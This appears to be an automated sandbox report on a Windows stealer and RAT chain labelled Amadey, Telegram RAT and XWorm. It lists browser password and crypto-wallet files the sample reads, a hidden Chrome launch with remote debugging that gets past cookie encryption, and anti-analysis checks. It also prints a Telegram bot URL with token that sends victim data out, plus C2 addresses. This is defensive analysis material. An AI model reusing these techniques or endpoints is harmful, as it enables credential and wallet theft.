Source: C:\Windows\System32\dxdiag.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0110~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.log VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\qmgr.db VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Windows\System32\svchost.exe Queries volume information: C:\ProgramData\Microsoft\Network\Downloader\edb.chk VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12CD010 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 7_2_00007FF7E12CD010
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Code function: 7_2_00007FF7E12E5C00 _get_daylight,_get_daylight,_get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation, 7_2_00007FF7E12E5C00
Source: C:\Windows\System32\dxdiag.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
AV process strings found (often used to terminate AV products)
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: OllyDbg.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Wireshark.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: samat.exe, 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: ollydbg.exe

Stealing of Sensitive Information
barindex
Yara detected Amadeys stealer DLL
Source: Yara match File source: 2.2.skotes.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.file.exe.6c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 3.2.skotes.exe.7a0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000003.00000002.2152067719.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.2104456781.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.2063442890.0000000005110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2148194212.00000000007A1000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.2662182646.0000000004F80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.2111686046.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000003.2104419686.0000000004CD0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Yara detected Telegram RAT
Source: Yara match File source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: samat.exe PID: 6120, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nphplpgoakhhjchkkhmiggakijnkhfnd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\webdata.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\khpkpbbcccdmmclmpigdgddabeilkdpd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhilaheimglignddkjgofkcbgekhenbh Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mgffkfbidihjpoaomajlbgchddlicgpn Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mdjmfdffdcmnoblignmgpommbefadffd Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hmeobnfnfcmdkdcmlblgagmfpfboieaf Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\passwords.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ebfidpplhabeedpnhjnobghokpiioolj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cgeeodpfagjceefieflmdfphplkenlfk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\epapihdplajcdnnkdeiahlgigofloibg Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pdadjkfkgcafgbceimcpbkalnfnepbnk Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc Jump to behavior

Remote Access Functionality
barindex
Attempt to bypass Chrome Application-Bound Encryption
Source: C:\Users\user\AppData\Local\Temp\1008029001\samat.exe Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9876 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
Yara detected Telegram RAT
Source: Yara match File source: 00000008.00000002.4562435004.000001BCCD110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: samat.exe PID: 6120, type: MEMORYSTR
Yara detected XWorm
Source: Yara match File source: sslproxydump.pcap, type: PCAP
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1560508 Sample: file.exe Startdate: 21/11/2024 Architecture: WINDOWS Score: 100 86 api.telegram.org 2->86 88 thedotmediagroup.com 2->88 90 10 other IPs or domains 2->90 118 Suricata IDS alerts for network traffic 2->118 120 Found malware configuration 2->120 122 Malicious sample detected (through community Yara rule) 2->122 126 11 other signatures 2->126 10 skotes.exe 19 2->10         started        15 file.exe 5 2->15         started        17 skotes.exe 2->17         started        19 7 other processes 2->19 signatures3 124 Uses the Telegram API (likely for C&C communication) 86->124 process4 dnsIp5 98 185.215.113.43, 49812, 49818, 49823 WHOLESALECONNECTIONSNL Portugal 10->98 100 thedotmediagroup.com 188.165.52.14, 443, 49824 OVHFR France 10->100 78 C:\Users\user\AppData\Local\...\samat.exe, PE32+ 10->78 dropped 80 C:\Users\user\AppData\Local\...\samat[1].exe, PE32+ 10->80 dropped 146 Hides threads from debuggers 10->146 148 Tries to detect sandboxes / dynamic malware analysis system (registry check) 10->148 150 Tries to detect process monitoring tools (Task Manager, Process Explorer etc.) 10->150 21 samat.exe 106 10->21         started        82 C:\Users\user\AppData\Local\...\skotes.exe, PE32 15->82 dropped 84 C:\Users\user\...\skotes.exe:Zone.Identifier, ASCII 15->84 dropped 152 Detected unpacking (changes PE section rights) 15->152 154 Tries to evade debugger and weak emulator (self modifying code) 15->154 156 Tries to detect virtualization through RDTSC time measurements 15->156 25 skotes.exe 15->25         started        102 127.0.0.1 unknown unknown 19->102 27 msedge.exe 19->27         started        30 msedge.exe 19->30         started        32 msedge.exe 19->32         started        34 2 other processes 19->34 file6 signatures7 process8 dnsIp9 68 C:\Users\user\AppData\...\win32crypt.pyd, PE32+ 21->68 dropped 70 C:\Users\user\AppData\...\unicodedata.pyd, PE32+ 21->70 dropped 72 C:\Users\user\AppData\Local\...\sqlite3.dll, PE32+ 21->72 dropped 74 67 other malicious files 21->74 dropped 128 Multi AV Scanner detection for dropped file 21->128 130 Attempt to bypass Chrome Application-Bound Encryption 21->130 132 Found pyInstaller with non standard icon 21->132 36 samat.exe 12 21->36         started        134 Detected unpacking (changes PE section rights) 25->134 136 Tries to detect sandboxes and other dynamic analysis tools (window names) 25->136 138 Tries to evade debugger and weak emulator (self modifying code) 25->138 140 3 other signatures 25->140 104 13.91.222.61, 443, 50031, 50041 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 27->104 106 20.110.205.119, 443, 50020, 50195 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 27->106 108 13 other IPs or domains 27->108 file10 signatures11 process12 dnsIp13 92 api.telegram.org 149.154.167.220, 443, 50152, 50154 TELEGRAMRU United Kingdom 36->92 94 api.myip.com 172.67.75.163, 443, 49896 CLOUDFLARENETUS United States 36->94 76 C:\Users\user\AppData\Local\...\passwords.db, SQLite 36->76 dropped 142 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 36->142 144 Tries to harvest and steal browser information (history, passwords, etc) 36->144 41 cmd.exe 1 36->41         started        43 chrome.exe 36->43         started        46 taskkill.exe 36->46         started        48 16 other processes 36->48 file14 signatures15 process16 dnsIp17 50 dxdiag.exe 41->50         started        53 conhost.exe 41->53         started        110 239.255.255.250 unknown Reserved 43->110 55 chrome.exe 43->55         started        58 conhost.exe 46->58         started        60 conhost.exe 48->60         started        62 msedge.exe 48->62         started        64 conhost.exe 48->64         started        66 12 other processes 48->66 process18 dnsIp19 112 Query firmware table information (likely to detect VMs) 50->112 114 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 50->114 116 Queries sensitive service information (via WMI, Win32_LogicalDisk, often done to detect sandboxes) 50->116 96 www.google.com 142.250.181.100, 443, 49942, 49944 GOOGLEUS United States 55->96 signatures20
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
185.215.113.43
 unknown Portugal
206894 WHOLESALECONNECTIONSNL true
142.251.35.161
 unknown United States
15169 GOOGLEUS false
23.44.203.17
 unknown United States
20940 AKAMAI-ASN1EU false
23.57.90.111
 unknown United States
35994 AKAMAI-ASUS false
152.195.19.97
 unknown United States
15133 EDGECASTUS false
18.238.49.99
 unknown United States
16509 AMAZON-02US false
104.126.116.98
 unknown United States
20940 AKAMAI-ASN1EU false
162.159.61.3
 chrome.cloudflare-dns.com United States
13335 CLOUDFLARENETUS false
149.154.167.220
 api.telegram.org United Kingdom
62041 TELEGRAMRU false
20.110.205.119
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
13.91.222.61
 unknown United States
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
104.126.116.83
 unknown United States
20940 AKAMAI-ASN1EU false
104.126.116.81
 unknown United States
20940 AKAMAI-ASN1EU false
94.245.104.56
 ssl.bingadsedgeextension-prod-europe.azurewebsites.net United Kingdom
8075 MICROSOFT-CORP-MSN-AS-BLOCKUS false
172.67.75.163
 api.myip.com United States
13335 CLOUDFLARENETUS false
142.250.181.100
 www.google.com United States
15169 GOOGLEUS false
239.255.255.250
 unknown Reserved
unknown unknown false
188.165.52.14
 thedotmediagroup.com France
16276 OVHFR false

Private

IP
127.0.0.1

Contacted Domains

Name IP Active
bg.microsoft.map.fastly.net 199.232.210.172 true
chrome.cloudflare-dns.com 162.159.61.3 true
api.myip.com 172.67.75.163 true
thedotmediagroup.com 188.165.52.14 true
ssl.bingadsedgeextension-prod-europe.azurewebsites.net 94.245.104.56 true
sb.scorecardresearch.com 3.160.188.18 true
www.google.com 142.250.181.100 true
api.telegram.org 149.154.167.220 true
googlehosted.l.googleusercontent.com 142.250.181.65 true
clients2.googleusercontent.com unknown unknown
bzib.nelreports.net unknown unknown
assets.msn.com unknown unknown
c.msn.com unknown unknown
ntp.msn.com unknown unknown
api.msn.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
https://assets.msn.com/bundles/v1/edgeChromium/latest/microsoft.48132e5427deb971ee28.js false
    		high
    https://api.telegram.org/bot6673004050:AAEcDfPnnGAswDvyrn9-bkOySVSnbPqLnBU/sendMessage?chat_id=1470436579&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A6513EFE8757A60506E5F%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20EVTO372NG%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%20XWorm%20V5.6 false
      		high